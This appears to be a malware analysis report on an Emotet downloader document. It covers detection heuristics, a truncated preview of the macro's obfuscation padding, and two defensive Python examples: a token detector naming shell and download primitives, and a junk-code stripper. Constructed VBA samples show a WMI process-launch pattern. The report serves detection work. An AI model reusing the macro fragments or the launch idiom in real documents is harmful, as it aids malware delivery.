Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment
ClamAV flags the sample with the signature 'Doc.Downloader.Emotet-6863643-0', which places it in the Emotet maldoc downloader family. The heuristics independently confirm the macro execution surface: the document carries VBA code with an AutoOpen entry point (run as soon as the document is opened with macros enabled) and a GetObject call, the usual way such macros obtain a COM or WMI object through which a command is launched. The extracted VBA source is about 70 KB, most of it padding: arithmetic on variables that are never read and Select Case blocks keyed on variables that are never assigned, with On Error Resume Next suppressing the resulting runtime errors. The visible preview ends at a truncated Set statement, so the download logic and any payload URL cannot be recovered from this excerpt; the only URL extracted from the document is an OOXML schema namespace, not a network indicator. Taken together, the signature and the AutoOpen/GetObject pairing strongly suggest a macro designed to download and execute a secondary payload.
Heuristics (8)

- ClamAV: Doc.Downloader.Emotet-6863643-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Emotet-6863643-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro; it runs when the document is opened and macros are enabled, with no further user interaction
- GetObject call [high] OLE_VBA_GETOBJ: GetObject call; it returns a reference to a COM or WMI object, a common way for a macro to reach a process-creation primitive
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (For this sample a VBA project was in fact recovered, see the extracted macros.bas below, so treat this marker as redundant with the AutoOpen finding rather than as an independent signal.)
- Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN: Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace that Office writes into documents, not a download or command-and-control address.
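The two macro heuristics that matter most here, the AutoOpen entry point and the GetObject call, are individually weak and only become a strong signal when they co-occur, which is exactly the rule OLE_VBA_PCODE_AUTOEXEC_EXEC applies to compiled streams when no source can be recovered. The following is an added example, not the analyzer's rule set and not code from the report: it applies that co-occurrence rule both to decoded VBA text and to a raw byte stream (matching tokens as ASCII and as UTF-16LE, which is how Office stores many strings). The token lists and the three inputs are constructed for illustration; a real p-code stream is more structured than this stand-in, and a production tool would use olevba or pcodedmp to recover identifiers.

```python
import re

# Token lists are this example's own assumptions, modelled on the kind of
# indicators the report's OLE_VBA_* heuristics describe; they are not the
# analyzer's actual rule set.
AUTOEXEC_TOKENS = ("AutoOpen", "AutoExec", "AutoClose", "Document_Open",
                   "Workbook_Open", "Auto_Open")
EXEC_TOKENS = ("GetObject", "CreateObject", "Shell", "WScript.Shell",
               "powershell", "URLDownloadToFile", "XMLHTTP", "ADODB.Stream")

# Constructed decoded VBA source (not the report's macros.bas): an AutoOpen
# entry point that reaches WMI through GetObject.
SAMPLE_SOURCE = '''Attribute VB_Name = "ThisDocument"
Sub AutoOpen()
    On Error Resume Next
    Set o = GetObject("winmgmts:")
    o.Get("Win32_Process").Create cmd, Null, Null, pid
End Sub
'''

# Constructed stand-in for a compiled/cache stream whose source could not be
# recovered: only identifier strings survive, some stored as UTF-16LE.
SAMPLE_STREAM = (b"\x00\x01\x7f" + "Document_Open".encode("utf-16-le") + b"\x00\x00"
                 + b"\x02\x03" + "GetObject".encode("utf-16-le") + b"\xff"
                 + b"Shell\x00\x04")

# Constructed benign macro: code is present but nothing runs on open.
SAMPLE_BENIGN = '''Sub FormatTable()
    Selection.Font.Bold = True
End Sub
'''


def _tokens_in_source(src):
    """Whole-identifier, case-insensitive token match over decoded VBA text."""
    found = set()
    for tok in AUTOEXEC_TOKENS + EXEC_TOKENS:
        pat = r"(?<![A-Za-z0-9_])" + re.escape(tok) + r"(?![A-Za-z0-9_])"
        if re.search(pat, src, re.IGNORECASE):
            found.add(tok)
    return found


def _tokens_in_bytes(data):
    """Raw-stream fallback: look for each token as ASCII and as UTF-16LE bytes."""
    found = set()
    for tok in AUTOEXEC_TOKENS + EXEC_TOKENS:
        if tok.encode("ascii") in data or tok.encode("utf-16-le") in data:
            found.add(tok)
    return found


def assess(autoexec, execs):
    """Co-occurrence rule: an entry point AND a run/fetch capability is the strong signal."""
    if autoexec and execs:
        return "high"
    if autoexec or execs:
        return "medium"   # one half only: worth an analyst look, not a verdict
    return "none"


def _report(found):
    autoexec = sorted(t for t in found if t in AUTOEXEC_TOKENS)
    execs = sorted(t for t in found if t in EXEC_TOKENS)
    return {"autoexec": autoexec, "exec": execs, "verdict": assess(autoexec, execs)}


def scan_source(src):
    """Scan decoded VBA source text."""
    return _report(_tokens_in_source(src))


def scan_stream(data):
    """Scan a raw module/cache stream when source extraction failed."""
    return _report(_tokens_in_bytes(data))


if __name__ == "__main__":
    for name, result in (("source", scan_source(SAMPLE_SOURCE)),
                         ("stream", scan_stream(SAMPLE_STREAM)),
                         ("benign", scan_source(SAMPLE_BENIGN))):
        print(name, result)
```

Byte-level matching is deliberately looser than source matching (no identifier boundaries, case-sensitive), because a stream may carry identifiers in either encoding and partial matches are cheap to review; the co-occurrence requirement is what keeps the false-positive rate acceptable, and a lone GetObject in a document with no auto-exec entry point stays at medium.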
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 70072 bytes | 1b60808f170b4570d02b602044d7acf19635d814464341de8a327c6001b9c367 |
Preview: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "Z_38110"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "b04543"
Function w_71_4_()
G___902 = 463496802 - 300565441
M_67647_ = 275529203 + r7022_6
Select Case t84420
Case 393055823
j26146 = Chr(66268235 * Tan(X7124_))
Y37841 = s0_360_3
Case 728148230
O_341__ = z_46__
o97185 = S20_9_60
Case 237004443
N_7_72 = 750649577
W56770 = H908_8
End Select
j2__70 = 18518068 - 131667192
s8_9_0 = 62015676 + X7__7_96
Select Case w9__11_
Case 497061171
z_09___6 = Chr(488412061 * Tan(f6_2__5))
t4__87 = u813101
Case 672540901
w8_3__ = K__4482
k__16_57 = S90_61
Case 601956749
E052_342 = 857795623
c1__5_ = c990_9
End Select
b3453__ = 104565420 - 775740543
X_4393 = 445355691 + Y___2_65
Select Case Y5_90_
Case 79199700
r__82_ = Chr(941390874 * Tan(T_99_01_))
K769_9 = c4978_38
Case 881299136
p4318_ = t848_6_
W52_0_67 = U_74_888
Case 65364877
v99_835 = 679947712
n95286 = M_842_
End Select
v75_37 = 453532830 - 412301132
U14788_7 = 95796094 + b523053
Select Case l573_93_
Case 953038870
w3473900 = Chr(12276949 * Tan(C1_634))
H43_429 = z5_8857
Case 381220213
w198357 = R87_276
V_6982_0 = Z_5110_7
Case 543573614
U__3_186 = 630158723
l0_235 = o880_01
End Select
q02__62 = 83606640 - 488853547
d12_91 = 143256400 + A_9306
Select Case B9_51_5
Case 683430457
z8__23_ = Chr(796771875 * Tan(b677_6))
G_18481_ = a5_2_733
Case 276270113
W6___193 = k558_77
p44153 = j_58244
Case 700988235
j58707 = 144854371
W8__0_ = W369_89
End Select
s888_31 = 49539378 - 772740888
L13_1440 = 996136666 + u0630712
Select Case v56__62
Case 165732834
F_94_31_ = Chr(634065621 * Tan(k_20_20))
B0145__ = t28__0
Case 74561086
O87474 = Y44157
l7_6_35 = n1___79
Case 728333453
z2_3_32 = 249365808
E80_324 = L2339043
End Select
P44_28_ = 988772114 - 646105999
q_2_32 = 241365347 + o5754_8
Select Case B1577_9
Case 668250859
h273__ = Chr(85106757 * Tan(b90699__))
h2_889__ = S575117
Case 347078999
i39___60 = h___3209
A__1632 = d28_158
Case 562870064
l4228_87 = 706307631
S_790068 = l_4203_
End Select
End Function
Function T__6___(s__083, h562_7_4)
On Error Resume Next
l_8_1_3 = 348603701 - 398410052
s4_662__ = 765062067 + d793_60
Select Case a2_8_062
Case 559876446
G29__6_6 = Chr(142959468 * Tan(Q_4415_1))
D13_667 = u54_57__
Case 470702012
R33__25 = D48_412
S_506_61 = o375835_
Case 835402729
O2_209_8 = 692878783
V_2840 = S_57_6
End Select
P20__23_ = 922571786 - 686756153
a5775934 = 179635042 + i51__6
Select Case z_57_583
Case 927261415
H65___51 = Chr(272938300 * Tan(m8_218_))
S__913 = F_64_46
Case 649192883
N_76_77 = m_517849
m_81__7 = z457_2
Case 470863079
z2431630 = 811410163
l803188_ = a5621876
End Select
M34368 = 572154674 - 867632956
s__2_6 = 598042126 + K_2_9138
Select Case B65_9_9
Case 843314296
H6_6_09 = Chr(853046827 * Tan(I5233725))
J_273_ = I538_80_
Case 14711409
u755_4 = H92043
I564129 = b9898676
Case 338829439
s053686 = 352550132
w6_27797 = t0649309
End Select
Set c____
... (truncated)
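The preview above is almost entirely padding of one shape: assignments to variables that are never read, and Select Case blocks keyed on variables that are never assigned whose bodies are more such assignments. Because every junk variable is written exactly once and read nowhere, a dead-store pass over the whole module removes the noise without having to evaluate any of the arithmetic. The following is an added example, not tooling from the report or code from the sample: it runs that pass over a constructed module written in the style of the preview (the single live GetObject statement is invented for illustration and is not what the truncated `Set c____` line resolves to). Set statements are never dropped, since object creation has side effects even when the result looks unused.

```python
import re

# Constructed VBA in the style of the preview (not the report's macros.bas):
# junk arithmetic and Select Case padding around a single live statement.
SAMPLE = """Function Run_1()
On Error Resume Next
G___902 = 463496802 - 300565441
M_67647_ = 275529203 + r7022_6
Select Case t84420
Case 393055823
j26146 = Chr(66268235 * Tan(X7124_))
Y37841 = s0_360_3
Case 728148230
O_341__ = z_46__
o97185 = S20_9_60
End Select
Set c1 = GetObject("winmgmts:")
c1.Get("Win32_Process").Create payload, Null, Null, pid
End Function"""

ASSIGN_RE = re.compile(r"^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+)$", re.IGNORECASE)
IDENT_RE = re.compile(r"[A-Za-z_]\w*")
SELECT_RE = re.compile(r"^\s*Select\s+Case\b", re.IGNORECASE)
END_SELECT_RE = re.compile(r"^\s*End\s+Select\b", re.IGNORECASE)
NOISE_ONLY_RE = re.compile(r"^\s*(Case\b|$)", re.IGNORECASE)


def dead_variables(src):
    """Names assigned somewhere but never read anywhere in the module.

    VBA identifiers are case-insensitive, so everything is compared lower-cased.
    """
    assigned, read = set(), set()
    for line in src.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            assigned.add(m.group(1).lower())
            read.update(t.lower() for t in IDENT_RE.findall(m.group(2)))  # RHS = reads
        else:
            read.update(t.lower() for t in IDENT_RE.findall(line))
    return assigned - read


def strip_junk(src):
    """Drop dead stores and Select Case blocks that contain nothing but dead stores."""
    return "\n".join(_strip(src.splitlines(), dead_variables(src)))


def _strip(lines, dead):
    out, i = [], 0
    while i < len(lines):
        line = lines[i]
        if SELECT_RE.match(line):
            j, depth = i, 0
            while j < len(lines):            # locate the matching End Select
                if SELECT_RE.match(lines[j]):
                    depth += 1
                elif END_SELECT_RE.match(lines[j]):
                    depth -= 1
                    if depth == 0:
                        break
                j += 1
            if j < len(lines):
                inner = _strip(lines[i + 1:j], dead)
                if all(NOISE_ONLY_RE.match(l) for l in inner):
                    i = j + 1                # only Case labels survived: padding
                    continue
                out.append(line)
                out.extend(inner)
                out.append(lines[j])
                i = j + 1
                continue
        m = ASSIGN_RE.match(line)
        is_set = line.lstrip().lower().startswith("set ")
        if m and not is_set and m.group(1).lower() in dead:
            i += 1                           # dead store, no side effects
            continue
        out.append(line)
        i += 1
    return out


if __name__ == "__main__":
    print(strip_junk(SAMPLE))
```

The pass is intentionally conservative: it only removes plain assignments whose target is never referenced again, so calls, Set statements and control flow with live content are preserved. Its blind spot is code that reads variables indirectly (built up through string concatenation and evaluated later), which a purely textual read/write analysis cannot see; confirm the result against the macro's actual behaviour in a sandbox rather than treating the stripped output as the ground truth.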